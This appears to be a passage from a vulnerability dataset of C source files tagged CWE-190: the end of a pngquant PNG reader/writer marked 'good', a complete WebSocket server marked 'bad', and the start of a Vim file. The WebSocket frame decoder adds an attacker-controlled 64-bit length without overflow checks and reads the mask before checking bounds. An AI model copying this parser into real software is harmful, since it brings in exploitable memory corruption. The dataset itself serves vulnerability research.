rwpng_error_handler, verbose ? rwpng_warning_stderr_handler : rwpng_warning_silent_handler);
if (!png_ptr) {
return PNG_OUT_OF_MEMORY_ERROR; /* out of memory */
}
info_ptr = png_create_info_struct(png_ptr);
if (!info_ptr) {
png_destroy_read_struct(&png_ptr, NULL, NULL);
return PNG_OUT_OF_MEMORY_ERROR; /* out of memory */
}
/* setjmp() must be called in every function that calls a non-trivial
* libpng function */
if (setjmp(mainprog_ptr->jmpbuf)) {
png_destroy_read_struct(&png_ptr, &info_ptr, NULL);
return LIBPNG_FATAL_ERROR; /* fatal libpng error (via longjmp()) */
}
#if defined(PNG_SKIP_sRGB_CHECK_PROFILE) && defined(PNG_SET_OPTION_SUPPORTED)
png_set_option(png_ptr, PNG_SKIP_sRGB_CHECK_PROFILE, PNG_OPTION_ON);
#endif
#if PNG_LIBPNG_VER >= 10500 && defined(PNG_UNKNOWN_CHUNKS_SUPPORTED)
/* copy standard chunks too */
png_set_keep_unknown_chunks(png_ptr, PNG_HANDLE_CHUNK_IF_SAFE, (png_const_bytep)"pHYs\0iTXt\0tEXt\0zTXt", 4);
#endif
png_set_read_user_chunk_fn(png_ptr, &mainprog_ptr->chunks, read_chunk_callback);
struct rwpng_read_data read_data = {infile, 0};
png_set_read_fn(png_ptr, &read_data, user_read_data);
png_read_info(png_ptr, info_ptr); /* read all PNG info up to image data */
/* alternatively, could make separate calls to png_get_image_width(),
* etc., but want bit_depth and color_type for later [don't care about
* compression_type and filter_type => NULLs] */
png_get_IHDR(png_ptr, info_ptr, &mainprog_ptr->width, &mainprog_ptr->height,
&bit_depth, &color_type, NULL, NULL, NULL);
/* expand palette images to RGB, low-bit-depth grayscale images to 8 bits,
* transparency chunks to full alpha channel; strip 16-bit-per-sample
* images to 8 bits per sample; and convert grayscale to RGB[A] */
/* GRR TO DO: preserve all safe-to-copy ancillary PNG chunks */
if (!(color_type & PNG_COLOR_MASK_ALPHA)) {
#ifdef PNG_READ_FILLER_SUPPORTED
png_set_expand(png_ptr);
png_set_filler(png_ptr, 65535L, PNG_FILLER_AFTER);
#else
fprintf(stderr, "pngquant readpng: image is neither RGBA nor GA\n");
png_destroy_read_struct(&png_ptr, &info_ptr, NULL);
mainprog_ptr->retval = WRONG_INPUT_COLOR_TYPE;
return mainprog_ptr->retval;
#endif
}
if (bit_depth == 16) {
png_set_strip_16(png_ptr);
}
if (!(color_type & PNG_COLOR_MASK_COLOR)) {
png_set_gray_to_rgb(png_ptr);
}
/* get source gamma for gamma correction, or use sRGB default */
double gamma = 0.45455;
if (png_get_valid(png_ptr, info_ptr, PNG_INFO_sRGB)) {
mainprog_ptr->input_color = RWPNG_SRGB;
mainprog_ptr->output_color = RWPNG_SRGB;
} else {
png_get_gAMA(png_ptr, info_ptr, &gamma);
if (gamma > 0 && gamma <= 1.0) {
mainprog_ptr->input_color = RWPNG_GAMA_ONLY;
mainprog_ptr->output_color = RWPNG_GAMA_ONLY;
} else {
fprintf(stderr, "pngquant readpng: ignored out-of-range gamma %f\n", gamma);
mainprog_ptr->input_color = RWPNG_NONE;
mainprog_ptr->output_color = RWPNG_NONE;
gamma = 0.45455;
}
}
mainprog_ptr->gamma = gamma;
png_set_interlace_handling(png_ptr);
/* all transformations have been registered; now update info_ptr data,
* get rowbytes and channels, and allocate image memory */
png_read_update_info(png_ptr, info_ptr);
rowbytes = png_get_rowbytes(png_ptr, info_ptr);
// For overflow safety reject images that won't fit in 32-bit
if (rowbytes > INT_MAX/mainprog_ptr->height) {
png_destroy_read_struct(&png_ptr, &info_ptr, NULL);
return PNG_OUT_OF_MEMORY_ERROR;
}
if ((mainprog_ptr->rgba_data = malloc(rowbytes * mainprog_ptr->height)) == NULL) {
fprintf(stderr, "pngquant readpng: unable to allocate image data\n");
png_destroy_read_struct(&png_ptr, &info_ptr, NULL);
return PNG_OUT_OF_MEMORY_ERROR;
}
png_bytepp row_pointers = rwpng_create_row_pointers(info_ptr, png_ptr, mainprog_ptr->rgba_data, mainprog_ptr->height, 0);
/* now we can go ahead and just read the whole image */
png_read_image(png_ptr, row_pointers);
/* and we're done! (png_read_end() can be omitted if no processing of
* post-IDAT text/time/etc. is desired) */
png_read_end(png_ptr, NULL);
#if USE_LCMS
#if PNG_LIBPNG_VER < 10500
png_charp ProfileData;
#else
png_bytep ProfileData;
#endif
png_uint_32 ProfileLen;
cmsHPROFILE hInProfile = NULL;
/* color_type is read from the image before conversion to RGBA */
int COLOR_PNG = color_type & PNG_COLOR_MASK_COLOR;
/* embedded ICC profile */
if (png_get_iCCP(png_ptr, info_ptr, &(png_charp){0}, &(int){0}, &ProfileData, &ProfileLen)) {
hInProfile = cmsOpenProfileFromMem(ProfileData, ProfileLen);
cmsColorSpaceSignature colorspace = cmsGetColorSpace(hInProfile);
/* only RGB (and GRAY) valid for PNGs */
if (colorspace == cmsSigRgbData && COLOR_PNG) {
mainprog_ptr->input_color = RWPNG_ICCP;
mainprog_ptr->output_color = RWPNG_SRGB;
} else {
if (colorspace == cmsSigGrayData && !COLOR_PNG) {
mainprog_ptr->input_color = RWPNG_ICCP_WARN_GRAY;
mainprog_ptr->output_color = RWPNG_SRGB;
}
cmsCloseProfile(hInProfile);
hInProfile = NULL;
}
}
/* build RGB profile from cHRM and gAMA */
if (hInProfile == NULL && COLOR_PNG &&
!png_get_valid(png_ptr, info_ptr, PNG_INFO_sRGB) &&
png_get_valid(png_ptr, info_ptr, PNG_INFO_gAMA) &&
png_get_valid(png_ptr, info_ptr, PNG_INFO_cHRM)) {
cmsCIExyY WhitePoint;
cmsCIExyYTRIPLE Primaries;
png_get_cHRM(png_ptr, info_ptr, &WhitePoint.x, &WhitePoint.y,
&Primaries.Red.x, &Primaries.Red.y,
&Primaries.Green.x, &Primaries.Green.y,
&Primaries.Blue.x, &Primaries.Blue.y);
WhitePoint.Y = Primaries.Red.Y = Primaries.Green.Y = Primaries.Blue.Y = 1.0;
cmsToneCurve *GammaTable[3];
GammaTable[0] = GammaTable[1] = GammaTable[2] = cmsBuildGamma(NULL, 1/gamma);
hInProfile = cmsCreateRGBProfile(&WhitePoint, &Primaries, GammaTable);
cmsFreeToneCurve(GammaTable[0]);
mainprog_ptr->input_color = RWPNG_GAMA_CHRM;
mainprog_ptr->output_color = RWPNG_SRGB;
}
/* transform image to sRGB colorspace */
if (hInProfile != NULL) {
cmsHPROFILE hOutProfile = cmsCreate_sRGBProfile();
cmsHTRANSFORM hTransform = cmsCreateTransform(hInProfile, TYPE_RGBA_8,
hOutProfile, TYPE_RGBA_8,
INTENT_PERCEPTUAL,
omp_get_max_threads() > 1 ? cmsFLAGS_NOCACHE : 0);
#pragma omp parallel for \
if (mainprog_ptr->height*mainprog_ptr->width > 8000) \
schedule(static)
for (unsigned int i = 0; i < mainprog_ptr->height; i++) {
/* It is safe to use the same block for both input and output
when both use the same TYPE. */
cmsDoTransform(hTransform, row_pointers[i],
row_pointers[i],
mainprog_ptr->width);
}
cmsDeleteTransform(hTransform);
cmsCloseProfile(hOutProfile);
cmsCloseProfile(hInProfile);
mainprog_ptr->gamma = 0.45455;
}
#endif
png_destroy_read_struct(&png_ptr, &info_ptr, NULL);
mainprog_ptr->file_size = read_data.bytes_read;
mainprog_ptr->row_pointers = (unsigned char **)row_pointers;
return SUCCESS;
}
#endif
static void rwpng_free_chunks(struct rwpng_chunk *chunk) {
if (!chunk) return;
rwpng_free_chunks(chunk->next);
free(chunk->data);
free(chunk);
}
void rwpng_free_image24(png24_image *image)
{
free(image->row_pointers);
image->row_pointers = NULL;
free(image->rgba_data);
image->rgba_data = NULL;
rwpng_free_chunks(image->chunks);
image->chunks = NULL;
}
void rwpng_free_image8(png8_image *image)
{
free(image->indexed_data);
image->indexed_data = NULL;
free(image->row_pointers);
image->row_pointers = NULL;
rwpng_free_chunks(image->chunks);
image->chunks = NULL;
}
pngquant_error rwpng_read_image24(FILE *infile, png24_image *input_image_p, int verbose)
{
#if USE_COCOA
return rwpng_read_image24_cocoa(infile, input_image_p);
#else
return rwpng_read_image24_libpng(infile, input_image_p, verbose);
#endif
}
static pngquant_error rwpng_write_image_init(rwpng_png_image *mainprog_ptr, png_structpp png_ptr_p, png_infopp info_ptr_p, int fast_compression)
{
/* could also replace libpng warning-handler (final NULL), but no need: */
*png_ptr_p = png_create_write_struct(PNG_LIBPNG_VER_STRING, mainprog_ptr, rwpng_error_handler, NULL);
if (!(*png_ptr_p)) {
return LIBPNG_INIT_ERROR; /* out of memory */
}
*info_ptr_p = png_create_info_struct(*png_ptr_p);
if (!(*info_ptr_p)) {
png_destroy_write_struct(png_ptr_p, NULL);
return LIBPNG_INIT_ERROR; /* out of memory */
}
/* setjmp() must be called in every function that calls a PNG-writing
* libpng function, unless an alternate error handler was installed--
* but compatible error handlers must either use longjmp() themselves
* (as in this program) or exit immediately, so here we go: */
if (setjmp(mainprog_ptr->jmpbuf)) {
png_destroy_write_struct(png_ptr_p, info_ptr_p);
return LIBPNG_INIT_ERROR; /* libpng error (via longjmp()) */
}
png_set_compression_level(*png_ptr_p, fast_compression ? Z_BEST_SPEED : Z_BEST_COMPRESSION);
png_set_compression_mem_level(*png_ptr_p, fast_compression ? 9 : 5); // judging by optipng results, smaller mem makes libpng compress slightly better
return SUCCESS;
}
static void rwpng_write_end(png_infopp info_ptr_p, png_structpp png_ptr_p, png_bytepp row_pointers)
{
png_write_info(*png_ptr_p, *info_ptr_p);
png_set_packing(*png_ptr_p);
png_write_image(*png_ptr_p, row_pointers);
png_write_end(*png_ptr_p, NULL);
png_destroy_write_struct(png_ptr_p, info_ptr_p);
}
static void rwpng_set_gamma(png_infop info_ptr, png_structp png_ptr, double gamma, rwpng_color_transform color)
{
if (color != RWPNG_GAMA_ONLY && color != RWPNG_NONE) {
png_set_gAMA(png_ptr, info_ptr, gamma);
}
if (color == RWPNG_SRGB) {
png_set_sRGB(png_ptr, info_ptr, 0); // 0 = Perceptual
}
}
pngquant_error rwpng_write_image8(FILE *outfile, const png8_image *mainprog_ptr)
{
png_structp png_ptr;
png_infop info_ptr;
if (mainprog_ptr->num_palette > 256) return INVALID_ARGUMENT;
pngquant_error retval = rwpng_write_image_init((rwpng_png_image*)mainprog_ptr, &png_ptr, &info_ptr, mainprog_ptr->fast_compression);
if (retval) return retval;
struct rwpng_write_state write_state;
write_state = (struct rwpng_write_state){
.outfile = outfile,
.maximum_file_size = mainprog_ptr->maximum_file_size,
.retval = SUCCESS,
};
png_set_write_fn(png_ptr, &write_state, user_write_data, user_flush_data);
// Palette images generally don't gain anything from filtering
png_set_filter(png_ptr, PNG_FILTER_TYPE_BASE, PNG_FILTER_VALUE_NONE);
rwpng_set_gamma(info_ptr, png_ptr, mainprog_ptr->gamma, mainprog_ptr->output_color);
/* set the image parameters appropriately */
int sample_depth;
#if PNG_LIBPNG_VER > 10400 /* old libpng corrupts files with low depth */
if (mainprog_ptr->num_palette <= 2)
sample_depth = 1;
else if (mainprog_ptr->num_palette <= 4)
sample_depth = 2;
else if (mainprog_ptr->num_palette <= 16)
sample_depth = 4;
else
#endif
sample_depth = 8;
struct rwpng_chunk *chunk = mainprog_ptr->chunks;
int chunk_num=0;
while(chunk) {
png_unknown_chunk pngchunk = {
.size = chunk->size,
.data = chunk->data,
.location = chunk->location,
};
memcpy(pngchunk.name, chunk->name, 5);
png_set_unknown_chunks(png_ptr, info_ptr, &pngchunk, 1);
#if defined(PNG_HAVE_IHDR) && PNG_LIBPNG_VER < 10600
png_set_unknown_chunk_location(png_ptr, info_ptr, chunk_num, pngchunk.location ? pngchunk.location : PNG_HAVE_IHDR);
#endif
chunk = chunk->next;
chunk_num++;
}
png_set_IHDR(png_ptr, info_ptr, mainprog_ptr->width, mainprog_ptr->height,
sample_depth, PNG_COLOR_TYPE_PALETTE,
0, PNG_COMPRESSION_TYPE_DEFAULT,
PNG_FILTER_TYPE_BASE);
png_color palette[256];
png_byte trans[256];
unsigned int num_trans = 0;
for(unsigned int i = 0; i < mainprog_ptr->num_palette; i++) {
palette[i] = (png_color){
.red = mainprog_ptr->palette[i].r,
.green = mainprog_ptr->palette[i].g,
.blue = mainprog_ptr->palette[i].b,
};
trans[i] = mainprog_ptr->palette[i].a;
if (mainprog_ptr->palette[i].a < 255) {
num_trans = i+1;
}
}
png_set_PLTE(png_ptr, info_ptr, palette, mainprog_ptr->num_palette);
if (num_trans > 0) {
png_set_tRNS(png_ptr, info_ptr, trans, num_trans, NULL);
}
rwpng_write_end(&info_ptr, &png_ptr, mainprog_ptr->row_pointers);
if (SUCCESS == write_state.retval && write_state.maximum_file_size && write_state.bytes_written > write_state.maximum_file_size) {
return TOO_LARGE_FILE;
}
return write_state.retval;
}
pngquant_error rwpng_write_image24(FILE *outfile, const png24_image *mainprog_ptr)
{
png_structp png_ptr;
png_infop info_ptr;
pngquant_error retval = rwpng_write_image_init((rwpng_png_image*)mainprog_ptr, &png_ptr, &info_ptr, 0);
if (retval) return retval;
png_init_io(png_ptr, outfile);
rwpng_set_gamma(info_ptr, png_ptr, mainprog_ptr->gamma, mainprog_ptr->output_color);
png_set_IHDR(png_ptr, info_ptr, mainprog_ptr->width, mainprog_ptr->height,
8, PNG_COLOR_TYPE_RGB_ALPHA,
0, PNG_COMPRESSION_TYPE_DEFAULT,
PNG_FILTER_TYPE_BASE);
png_bytepp row_pointers = rwpng_create_row_pointers(info_ptr, png_ptr, mainprog_ptr->rgba_data, mainprog_ptr->height, 0);
rwpng_write_end(&info_ptr, &png_ptr, row_pointers);
free(row_pointers);
return SUCCESS;
}
static void rwpng_error_handler(png_structp png_ptr, png_const_charp msg)
{
rwpng_png_image *mainprog_ptr;
/* This function, aside from the extra step of retrieving the "error
* pointer" (below) and the fact that it exists within the application
* rather than within libpng, is essentially identical to libpng's
* default error handler. The second point is critical: since both
* setjmp() and longjmp() are called from the same code, they are
* guaranteed to have compatible notions of how big a jmp_buf is,
* regardless of whether _BSD_SOURCE or anything else has (or has not)
* been defined. */
fprintf(stderr, " error: %s (libpng failed)\n", msg);
fflush(stderr);
mainprog_ptr = png_get_error_ptr(png_ptr);
if (mainprog_ptr == NULL) abort();
longjmp(mainprog_ptr->jmpbuf, 1);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_5162_0 |
crossvul-cpp_data_bad_400_3 | /*
* Description:
* History: yang@haipo.me, 2017/04/26, create
*/
# include <stdbool.h>
# include <openssl/sha.h>
# include "ut_log.h"
# include "ut_misc.h"
# include "ut_base64.h"
# include "ut_ws_svr.h"
struct ws_frame {
uint8_t fin;
uint8_t opcode;
uint64_t payload_len;
void *payload;
};
struct clt_info {
nw_ses *ses;
void *privdata;
double last_activity;
struct http_parser parser;
sds field;
bool field_set;
sds value;
bool value_set;
bool upgrade;
sds remote;
sds url;
sds message;
http_request_t *request;
struct ws_frame frame;
};
static int on_http_message_begin(http_parser* parser)
{
struct clt_info *info = parser->data;
if (info->request)
http_request_release(info->request);
info->request = http_request_new();
if (info->request == NULL) {
return -__LINE__;
}
return 0;
}
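/* Build the RFC 6455 handshake reply: Sec-WebSocket-Accept is
* base64(SHA-1(client key + fixed GUID)), sent back in a
* "101 Switching Protocols" response with the Upgrade/Connection headers. */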
static int send_hand_shake_reply(nw_ses *ses, char *protocol, const char *key)
{
unsigned char hash[20];
sds data = sdsnew(key);
data = sdscat(data, "258EAFA5-E914-47DA-95CA-C5AB0DC85B11");
SHA1((const unsigned char *)data, sdslen(data), hash);
sdsfree(data);
sds b4message;
base64_encode(hash, sizeof(hash), &b4message);
http_response_t *response = http_response_new();
http_response_set_header(response, "Upgrade", "websocket");
http_response_set_header(response, "Connection", "Upgrade");
http_response_set_header(response, "Sec-WebSocket-Accept", b4message);
if (protocol) {
http_response_set_header(response, "Sec-WebSocket-Protocol", protocol);
}
response->status = 101;
sds message = http_response_encode(response);
nw_ses_send(ses, message, sdslen(message));
sdsfree(message);
sdsfree(b4message);
return 0;
}
static bool is_good_protocol(const char *protocol_list, const char *protocol)
{
char *tmp = strdup(protocol_list);
char *pch = strtok(tmp, ", ");
while (pch != NULL) {
if (strcmp(pch, protocol) == 0) {
free(tmp);
return true;
}
pch = strtok(NULL, ", ");
}
free(tmp);
return false;
}
static bool is_good_origin(const char *origin, const char *require)
{
size_t origin_len = strlen(origin);
size_t require_len = strlen(require);
if (origin_len < require_len)
return false;
if (memcmp(origin + (origin_len - require_len), require, require_len) != 0)
return false;
return true;
}
static int on_http_message_complete(http_parser* parser)
{
struct clt_info *info = parser->data;
ws_svr *svr = ws_svr_from_ses(info->ses);
info->request->version_major = parser->http_major;
info->request->version_minor = parser->http_minor;
info->request->method = parser->method;
dict_entry *entry;
dict_iterator *iter = dict_get_iterator(info->request->headers);
while ((entry = dict_next(iter)) != NULL) {
log_trace("Header: %s: %s", (char *)entry->key, (char *)entry->val);
}
dict_release_iterator(iter);
if (info->request->method != HTTP_GET)
goto error;
if (http_request_get_header(info->request, "Host") == NULL)
goto error;
double version = info->request->version_major + info->request->version_minor * 0.1;
if (version < 1.1)
goto error;
const char *upgrade = http_request_get_header(info->request, "Upgrade");
if (upgrade == NULL || strcasecmp(upgrade, "websocket") != 0)
goto error;
const char *connection = http_request_get_header(info->request, "Connection");
if (connection == NULL)
goto error;
else {
bool found_upgrade = false;
int count;
sds *tokens = sdssplitlen(connection, strlen(connection), ",", 1, &count);
if (tokens == NULL)
goto error;
for (int i = 0; i < count; i++) {
sds token = tokens[i];
sdstrim(token, " ");
if (strcasecmp(token, "Upgrade") == 0) {
found_upgrade = true;
break;
}
}
sdsfreesplitres(tokens, count);
if (!found_upgrade)
goto error;
}
const char *ws_version = http_request_get_header(info->request, "Sec-WebSocket-Version");
if (ws_version == NULL || strcmp(ws_version, "13") != 0)
goto error;
const char *ws_key = http_request_get_header(info->request, "Sec-WebSocket-Key");
if (ws_key == NULL)
goto error;
const char *protocol_list = http_request_get_header(info->request, "Sec-WebSocket-Protocol");
if (protocol_list && !is_good_protocol(protocol_list, svr->protocol))
goto error;
if (strlen(svr->origin) > 0) {
const char *origin = http_request_get_header(info->request, "Origin");
if (origin == NULL || !is_good_origin(origin, svr->origin))
goto error;
}
if (svr->type.on_privdata_alloc) {
info->privdata = svr->type.on_privdata_alloc(svr);
if (info->privdata == NULL)
goto error;
}
info->upgrade = true;
info->remote = sdsnew(http_get_remote_ip(info->ses, info->request));
info->url = sdsnew(info->request->url);
if (svr->type.on_upgrade) {
svr->type.on_upgrade(info->ses, info->remote);
}
if (protocol_list) {
send_hand_shake_reply(info->ses, svr->protocol, ws_key);
} else {
send_hand_shake_reply(info->ses, NULL, ws_key);
}
return 0;
error:
ws_svr_close_clt(ws_svr_from_ses(info->ses), info->ses);
return -1;
}
static int on_http_url(http_parser* parser, const char* at, size_t length)
{
struct clt_info *info = parser->data;
if (info->request->url)
sdsfree(info->request->url);
info->request->url = sdsnewlen(at, length);
return 0;
}
static int on_http_header_field(http_parser* parser, const char* at, size_t length)
{
struct clt_info *info = parser->data;
info->field_set = true;
if (info->field == NULL) {
info->field = sdsnewlen(at, length);
} else {
info->field = sdscpylen(info->field, at, length);
}
return 0;
}
static int on_http_header_value(http_parser* parser, const char* at, size_t length)
{
struct clt_info *info = parser->data;
info->value_set = true;
if (info->value == NULL) {
info->value = sdsnewlen(at, length);
} else {
info->value = sdscpylen(info->value, at, length);
}
if (info->field_set && info->value_set) {
http_request_set_header(info->request, info->field, info->value);
info->field_set = false;
info->value_set = false;
}
return 0;
}
static int on_http_body(http_parser* parser, const char* at, size_t length)
{
struct clt_info *info = parser->data;
info->request->body = sdsnewlen(at, length);
return 0;
}
static bool is_good_opcode(uint8_t opcode)
{
static uint8_t good_list[] = { 0x0, 0x1, 0x2, 0x8, 0x9, 0xa };
for (size_t i = 0; i < sizeof(good_list); ++i) {
if (opcode == good_list[i])
return true;
}
return false;
}
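/* Parse one RFC 6455 frame header: byte 0 carries FIN and the opcode,
* byte 1 carries the MASK bit and a 7-bit length (126/127 select a 16- or
* 64-bit extended length), followed by the 4-byte masking key. The payload
* is unmasked in place. Returns the full frame size, 0 if more data is
* needed, or -1 on a malformed frame. */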
static int decode_pkg(nw_ses *ses, void *data, size_t max)
{
struct clt_info *info = ses->privdata;
if (!info->upgrade) {
return max;
}
if (max < 2)
return 0;
uint8_t *p = data;
size_t pkg_size = 0;
memset(&info->frame, 0, sizeof(info->frame));
info->frame.fin = p[0] & 0x80;
info->frame.opcode = p[0] & 0x0f;
if (!is_good_opcode(info->frame.opcode))
return -1;
uint8_t mask = p[1] & 0x80;
if (mask == 0)
return -1;
uint8_t len = p[1] & 0x7f;
if (len < 126) {
pkg_size = 2;
info->frame.payload_len = len;
} else if (len == 126) {
pkg_size = 2 + 2;
if (max < pkg_size)
return 0;
info->frame.payload_len = be16toh(*(uint16_t *)(p + 2));
} else if (len == 127) {
pkg_size = 2 + 8;
if (max < pkg_size)
return 0;
info->frame.payload_len = be64toh(*(uint64_t *)(p + 2));
}
uint8_t masks[4];
memcpy(masks, p + pkg_size, sizeof(masks));
pkg_size += sizeof(masks);
info->frame.payload = p + pkg_size;
pkg_size += info->frame.payload_len;
if (max < pkg_size)
return 0;
p = info->frame.payload;
for (size_t i = 0; i < info->frame.payload_len; ++i) {
p[i] = p[i] ^ masks[i & 3];
}
return pkg_size;
}
static void on_error_msg(nw_ses *ses, const char *msg)
{
log_error("peer: %s: %s", nw_sock_human_addr(&ses->peer_addr), msg);
}
static void on_new_connection(nw_ses *ses)
{
log_trace("new connection from: %s", nw_sock_human_addr(&ses->peer_addr));
struct clt_info *info = ses->privdata;
memset(info, 0, sizeof(struct clt_info));
info->ses = ses;
info->last_activity = current_timestamp();
http_parser_init(&info->parser, HTTP_REQUEST);
info->parser.data = info;
}
static void on_connection_close(nw_ses *ses)
{
log_trace("connection %s close", nw_sock_human_addr(&ses->peer_addr));
struct clt_info *info = ses->privdata;
struct ws_svr *svr = ws_svr_from_ses(ses);
if (info->upgrade) {
if (svr->type.on_close) {
svr->type.on_close(ses, info->remote);
}
if (svr->type.on_privdata_free) {
svr->type.on_privdata_free(svr, info->privdata);
}
}
}
static void *on_privdata_alloc(void *svr)
{
ws_svr *w_svr = ((nw_svr *)svr)->privdata;
return nw_cache_alloc(w_svr->privdata_cache);
}
static void on_privdata_free(void *svr, void *privdata)
{
struct clt_info *info = privdata;
if (info->field) {
sdsfree(info->field);
}
if (info->value) {
sdsfree(info->value);
}
if (info->remote) {
sdsfree(info->remote);
}
if (info->url) {
sdsfree(info->url);
}
if (info->message) {
sdsfree(info->message);
}
if (info->request) {
http_request_release(info->request);
}
ws_svr *w_svr = ((nw_svr *)svr)->privdata;
nw_cache_free(w_svr->privdata_cache, privdata);
}
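/* Encode a single unmasked server-to-client frame: FIN + opcode in the
* first byte, then the 7-bit length or 16-/64-bit extended length, then the
* payload. A static buffer is grown on demand and reused across calls. */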
static int send_reply(nw_ses *ses, uint8_t opcode, void *payload, size_t payload_len)
{
if (payload == NULL)
payload_len = 0;
static void *buf;
static size_t buf_size = 1024;
if (buf == NULL) {
buf = malloc(1024);
if (buf == NULL)
return -1;
}
size_t require_len = 10 + payload_len;
if (buf_size < require_len) {
void *new = realloc(buf, require_len);
if (new == NULL)
return -1;
buf = new;
buf_size = require_len;
}
size_t pkg_len = 0;
uint8_t *p = buf;
p[0] = 0;
p[0] |= 0x1 << 7;
p[0] |= opcode;
p[1] = 0;
if (payload_len < 126) {
uint8_t len = payload_len;
p[1] |= len;
pkg_len = 2;
} else if (payload_len <= 0xffff) {
p[1] |= 126;
uint16_t len = htobe16((uint16_t)payload_len);
memcpy(p + 2, &len, sizeof(len));
pkg_len = 2 + sizeof(len);
} else {
p[1] |= 127;
uint64_t len = htobe64(payload_len);
memcpy(p + 2, &len, sizeof(len));
pkg_len = 2 + sizeof(len);
}
if (payload) {
memcpy(p + pkg_len, payload, payload_len);
pkg_len += payload_len;
}
return nw_ses_send(ses, buf, pkg_len);
}
static int send_pong_message(nw_ses *ses)
{
return send_reply(ses, 0xa, NULL, 0);
}
static void on_recv_pkg(nw_ses *ses, void *data, size_t size)
{
struct clt_info *info = ses->privdata;
ws_svr *svr = ws_svr_from_ses(ses);
info->last_activity = current_timestamp();
if (!info->upgrade) {
size_t nparsed = http_parser_execute(&info->parser, &svr->settings, data, size);
if (!info->parser.upgrade && nparsed != size) {
log_error("peer: %s http parse error: %s (%s)", nw_sock_human_addr(&ses->peer_addr),
http_errno_description(HTTP_PARSER_ERRNO(&info->parser)),
http_errno_name(HTTP_PARSER_ERRNO(&info->parser)));
nw_svr_close_clt(svr->raw_svr, ses);
}
return;
}
switch (info->frame.opcode) {
case 0x8:
nw_svr_close_clt(svr->raw_svr, ses);
return;
case 0x9:
send_pong_message(ses);
return;
case 0xa:
return;
}
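/* Data frame (text/binary/continuation): accumulate the payload until the
* final fragment arrives, then hand the complete message to the callback. */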
if (info->message == NULL)
info->message = sdsempty();
info->message = sdscatlen(info->message, info->frame.payload, info->frame.payload_len);
if (info->frame.fin) {
int ret = svr->type.on_message(ses, info->remote, info->url, info->message, sdslen(info->message));
if (ses->id != 0) {
if (ret < 0) {
nw_svr_close_clt(svr->raw_svr, ses);
} else {
sdsfree(info->message);
info->message = NULL;
}
}
}
}
static void on_timer(nw_timer *timer, void *privdata)
{
ws_svr *svr = privdata;
double now = current_timestamp();
nw_ses *curr = svr->raw_svr->clt_list_head;
nw_ses *next;
while (curr) {
next = curr->next;
struct clt_info *info = curr->privdata;
if (now - info->last_activity > svr->keep_alive) {
log_error("peer: %s: last_activity: %f, idle too long", nw_sock_human_addr(&curr->peer_addr), info->last_activity);
nw_svr_close_clt(svr->raw_svr, curr);
}
curr = next;
}
}
ws_svr *ws_svr_create(ws_svr_cfg *cfg, ws_svr_type *type)
{
if (type->on_message == NULL)
return NULL;
if (type->on_privdata_alloc && !type->on_privdata_free)
return NULL;
ws_svr *svr = malloc(sizeof(ws_svr));
memset(svr, 0, sizeof(ws_svr));
nw_svr_cfg raw_cfg;
memset(&raw_cfg, 0, sizeof(raw_cfg));
raw_cfg.bind_count = cfg->bind_count;
raw_cfg.bind_arr = cfg->bind_arr;
raw_cfg.max_pkg_size = cfg->max_pkg_size;
raw_cfg.buf_limit = cfg->buf_limit;
raw_cfg.read_mem = cfg->read_mem;
raw_cfg.write_mem = cfg->write_mem;
nw_svr_type st;
memset(&st, 0, sizeof(st));
st.decode_pkg = decode_pkg;
st.on_error_msg = on_error_msg;
st.on_new_connection = on_new_connection;
st.on_connection_close = on_connection_close;
st.on_recv_pkg = on_recv_pkg;
st.on_privdata_alloc = on_privdata_alloc;
st.on_privdata_free = on_privdata_free;
svr->raw_svr = nw_svr_create(&raw_cfg, &st, svr);
if (svr->raw_svr == NULL) {
free(svr);
return NULL;
}
memset(&svr->settings, 0, sizeof(http_parser_settings));
svr->settings.on_message_begin = on_http_message_begin;
svr->settings.on_url = on_http_url;
svr->settings.on_header_field = on_http_header_field;
svr->settings.on_header_value = on_http_header_value;
svr->settings.on_body = on_http_body;
svr->settings.on_message_complete = on_http_message_complete;
svr->keep_alive = cfg->keep_alive;
svr->protocol = strdup(cfg->protocol);
svr->origin = strdup(cfg->origin);
svr->privdata_cache = nw_cache_create(sizeof(struct clt_info));
memcpy(&svr->type, type, sizeof(ws_svr_type));
if (cfg->keep_alive > 0) {
nw_timer_set(&svr->timer, 60, true, on_timer, svr);
nw_timer_start(&svr->timer);
}
return svr;
}
int ws_svr_start(ws_svr *svr)
{
int ret = nw_svr_start(svr->raw_svr);
if (ret < 0)
return ret;
return 0;
}
int ws_svr_stop(ws_svr *svr)
{
int ret = nw_svr_stop(svr->raw_svr);
if (ret < 0)
return ret;
return 0;
}
ws_svr *ws_svr_from_ses(nw_ses *ses)
{
return ((nw_svr *)ses->svr)->privdata;
}
void *ws_ses_privdata(nw_ses *ses)
{
struct clt_info *info = ses->privdata;
return info->privdata;
}
int ws_send_text(nw_ses *ses, char *message)
{
return send_reply(ses, 0x1, message, strlen(message));
}
int ws_send_binary(nw_ses *ses, void *data, size_t size)
{
return send_reply(ses, 0x2, data, size);
}
static int broadcast_message(ws_svr *svr, uint8_t opcode, void *data, size_t size)
{
nw_ses *curr = svr->raw_svr->clt_list_head;
while (curr) {
nw_ses *next = curr->next;
struct clt_info *info = curr->privdata;
if (info->upgrade) {
int ret = send_reply(curr, opcode, data, size);
if (ret < 0)
return ret;
}
curr = next;
}
return 0;
}
int ws_svr_broadcast_text(ws_svr *svr, char *message)
{
return broadcast_message(svr, 0x1, message, strlen(message));
}
int ws_svr_broadcast_binary(ws_svr *svr, void *data, size_t size)
{
return broadcast_message(svr, 0x2, data, size);
}
void ws_svr_close_clt(ws_svr *svr, nw_ses *ses)
{
nw_svr_close_clt(svr->raw_svr, ses);
}
void ws_svr_release(ws_svr *svr)
{
nw_svr_release(svr->raw_svr);
nw_timer_stop(&svr->timer);
nw_cache_release(svr->privdata_cache);
free(svr->protocol);
free(svr);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_400_3 |
crossvul-cpp_data_bad_3179_1 | /* vi:set ts=8 sts=4 sw=4 noet:
*
* VIM - Vi IMproved by Bram Moolenaar
*
* Do ":help uganda" in Vim to read copying and usage conditions.
* Do ":help credits" in Vim to see a list of people who contributed.
* See README.txt for an overview of the Vim source code.
*/
#include "vim.h"
#ifdef AMIGA
# include <time.h> /* for time() */
#endif
/*
* Vim originated from Stevie version 3.6 (Fish disk 217) by GRWalter (Fred)
* It has been changed beyond recognition since then.
*
* Differences between version 7.4 and 8.x can be found with ":help version8".
* Differences between version 6.4 and 7.x can be found with ":help version7".
* Differences between version 5.8 and 6.x can be found with ":help version6".
* Differences between version 4.x and 5.x can be found with ":help version5".
